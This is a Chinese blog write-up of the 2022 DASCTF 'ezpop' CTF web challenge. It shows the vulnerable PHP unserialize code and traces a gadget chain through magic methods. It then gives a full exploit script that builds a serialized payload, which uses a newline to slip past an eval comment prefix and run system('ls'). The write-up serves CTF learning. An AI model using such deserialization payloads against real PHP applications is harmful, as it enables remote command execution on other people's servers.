[2022DASCTF]ezpop

最新推荐文章于 2024-04-21 11:16:34 发布
最新推荐文章于 2024-04-21 11:16:34 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: WEB 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63045593/article/details/124353143
版权

[2022DASCTF]ezpop

 <?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }
    
    public function __invoke()
    {
        $this->v1->world();
    }

}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }
    
    public function run()
    {
        ($this->f1)();
    }
    
    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }

}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }
    
    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

?>

__destruct入口

public function __destruct()
{
    echo $this->f1 . '114514';
}

$a=new fin() (入口该位置有字符拼接,正好what处有tostring) -->f1=new what()

public function __toString()
{
    $this->a->run();
    return 'hello';
}

$b=new what(); -->a =new mix()(mix处和fin处同时有run mix处没跳过所以走一下吧)

public $m1;

public function run()
{
    ($this->m1)();
}

$c=new mix(); -->m1=new crow();

public function __invoke()
{
    $this->v1->world();
}

public function __call($a, $b)
{
    echo $this->f1->get_flag();
}

crow的invoke跳到fin 的call

$a2=new fin();

public function get_flag()
{
    eval('#' . $this->m1);
}

call 跳到mix的getflag

最后

<?php

class crow
{
    public $v1;
    public $v2;

}

class fin
{
    public $f1;

}

class what
{
    public $a;

}
class mix
{
    public $m1;

}

$a=new fin();

$b=new what();

$c=new mix();

$d=new crow();

$a2=new fin();

$c2=new mix();



$a->f1=$b;
$b->a=$c;
$c->m1=$d;
$d->v1=$a2;
$a2->f1=$c2;
$c2->m1="
system(\"ls\");"; ///cat *查看


echo urlencode(serialize($a))

?>

这个位置是加换行绕过#

$c2->m1="system(\"ls\");";

在这里插入图片描述

$c2->m1="
system(\"ls\");";

在这里插入图片描述

解:

绕过eval前面的#加回车

!Tana
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ (1).zip
12-07
DASCTF 吉林工师 欢迎来到魔法世界 ctf 真题
2022DASCTF7月赋能赛(复现)
m0_62422842的博客
07-28 2388
DASCTF七月赋能赛的三个web题复现,涉及到sql注入,模板注入,php反序列化以及session文件包含
DASCTF部分复现
qq_63928796的博客
08-08 2162
过滤了大括号 {{,我们可以用 {%print(......)%} 或 {% if ... %}1{% endif %} 的形式来代替,但是题目还过滤了 print 关键字,所以前者用不了了,只能用 {% if ... %}success{% endif %} 的形式来bypass了。因为whatisthis里头的数字,有的很大,我们尝试生成一个小数点长度在10000的圆周率出来,看看能得到什么,圆周率生成的脚本用的是下面这个网址的大佬的脚本。首先利用FTK挂载一下vmdk文件,得到加密的磁盘。...
[MRCTF2020]Ezpop(详解)
pakho_C的博客
07-29 2219
将pop对象的参数source作为Show类的对象(此时source对象也有两个参数source和str),则会执行__toString()函数,returnsource对象的str参数的source,此时str如果是Test类的一个对象,则没有source参数,执行__toString()函数则会找不到source参数,就会调用Test类对象str的__get()函数。所以可以将参数p设置为Modifier类的对象,从而执行__invoke()函数,进而执行append函数。...
DASCTF Apr.2023 X SU Writeup By AheadSec
末初的CSDN博客
04-23 4878
DASCTF Apr.2023 X SU Writeup By AheadSec
国赛ezpop题目复现(tp6)
m0_62422842的博客
07-21 620
顺着这个题目,也抛砖引玉一下,对thinkphp6.0.12框架的反序列化链进行了一个分析。
2023羊城杯 DASCTF EZ-Misc
09-03
2023羊城杯 DASCTF EZ-Misc
自动提交flag到指定服务器python脚本
05-12
自动从txt读取flag并提交指定平台python脚本,AWD比赛专用,可以自定义内容,批量提交等,确保速度
安恒_务实的网络安全.pdf
08-15
安恒_务实的网络安全 业务安全
Ant & SVN task script
11-17
it's very article which introduece svn task work with ant script in your project.
BUUCTF [MRCTF2020]Ezpop 详解
lzu_lfl的博客
11-09 576
pop链
[MRCTF2020]Ezpop解析
06-30 194
魔法函数:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。创建类对象时自动调用 当使用 new 操作符创建一个类的实例时,构造方法将会自动调用__toString() 会在需要转成字符串时, 会隐式自动调用它, 在PHP内部. 这个也是来自JAVA的当一个对象被当作一个字符串被调用。使用unserialize时触发__get() 用于从不可访问的属性读取数据 #难以访问包括:(1)私有属性,(2)没有初始化的属性。
DASCTF2022 ——十月赛 Web 部分Writeup
渗透测试研究中心
10-28 1403
EasyPOP题目环境是 php 7.4, 图省事直接把所有属性的类型都改成 public起点是 sorry 类的__destruct(), 由echo $this->hint调用到 show 类的__toString()方法, 然后通过执行$this->ctf->show()跳转 secret_code 类的__call(), 进而到show()方法, ...
DASCTF 2022九月赛WEB
weixin_43952190的博客
09-22 733
CTF
[MRCTF2020]Ezpop
FUCKING12的博客
01-01 191
先创建2个show对象a,b,在最后反序列化的时候$a=new Show()会调用__wakeup()函数,此时a->source是b,b此时是一个Show()对象,就会调用b里面__toString()方法,此时b里面的str是Test()对象,Test()对象没有source变量,便会调用Test()里面的__get()方法,将Test()类里面的p创建为Modifier(),然后就会调用Modifier()里面的__invoke()方法,执行append()函数,实现文件执行的功能。
DASCTF 2023 & 0X401七月暑期挑战赛-Crypto复现
Emmaaaaa's blog
07-24 777
关键词:光滑数,Franklin-Reiter相关消息攻击,copper求t,groebner_basis() 之前做过相关消息攻击的题,但都是那种一眼就能看出来的,这次遇到两道不寻常的,值得记录,求解方法也更加多元化了哈哈,只能说还有待提高,继续加油吧!
DASCTF X GFCTF 2024|四月开启第一局
最新发布
qq_61670993的博客
04-21 668
简单题
[DASCTF 2023]controlflow
CHTXRT的博客
07-22 304
直接反编译,通过汇编代码结合动态调试综合分析,得到输入数据变化过程大致如下:(设输入字符串为。出处:https://blog.csdn.net/CHTXRT。」创作共享协议,转载请在文章明显位置注明作者及出处。
安恒月赛 DASCTF 7月赛
pone2233的博客
07-25 1151
文章目录比赛介绍比赛感受Miscwelcome to the misc world | 成功QrJoker | 未验证过,因为比赛结束了 比赛介绍 安恒月赛 DASCTF 7月赛 比赛感受 这次太菜了,都做只做了2个,哎,我觉得还需要锻炼,加油。 Misc welcome to the misc world | 成功 拿到文件使用7z这个压缩包软件,直接能看到这个flag,在这里,可是需要解压密码 我就开始分析一下这个给的素材 在图片红色通道看到png的格式 点击这个Save Bin 保存一个图片文件
2022dasctf x su 三月春季挑战赛
03-16
非常感谢您的关注和参与,2022年的DASCTF x SU三月春季挑战赛将会是一场精彩的比赛。我们将会为参赛者提供丰富多彩的挑战,让大家可以在比赛中不断提升自己的技能和能力。希望您能够积极参与,共同创造一个充满挑战...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值